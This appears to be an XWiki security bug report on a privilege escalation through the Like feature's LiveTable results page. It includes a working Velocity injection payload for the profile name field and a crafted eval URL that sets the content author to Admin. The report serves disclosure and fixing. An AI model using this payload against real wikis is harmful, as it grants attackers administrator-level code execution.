Privilege escalation (PR) from account through like LiveTableResults

Steps to reproduce:

1. In the user profile, set your first name to 

   {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval) 

2. Click on the Like-button at the bottom left of your user profile.
3. Open <xwiki-host>/xwiki/bin/get/XWiki/Like/Code/LiveTableResultPage?outputSyntax=plain&offset=0&limit=10&eval=%23set(%24mydoc%20%3D%20%24doc.getDocument())%20%24mydoc.setContentAuthorReference(%22xwiki%3AXWiki.Admin%22)%20%24mydoc.setTitle(%22Hello%20World%22)%20%24mydoc.getTitle(), where <xwiki-host> is the URL of your XWiki installation.

Expected result:

The property

"doc_title":"Profile of {{cache timeToLive=1}}{{velocity}}#evaluate($request.eval)"

is in the JSON.

Actual result:

The property "doc_title":"Profile of Hello World " is in the result, showing that the Velocity code that is passed in the URL parameter eval has been executed with programming rights.

This demonstrates a privilege escalation from account to programming rights due to missing escaping in the LiveTable results page. While this document was introduced in 13.4-rc-1, the same code was also in XWiki.Like.UserProfileUIX in earlier versions so the true affects version is probably older.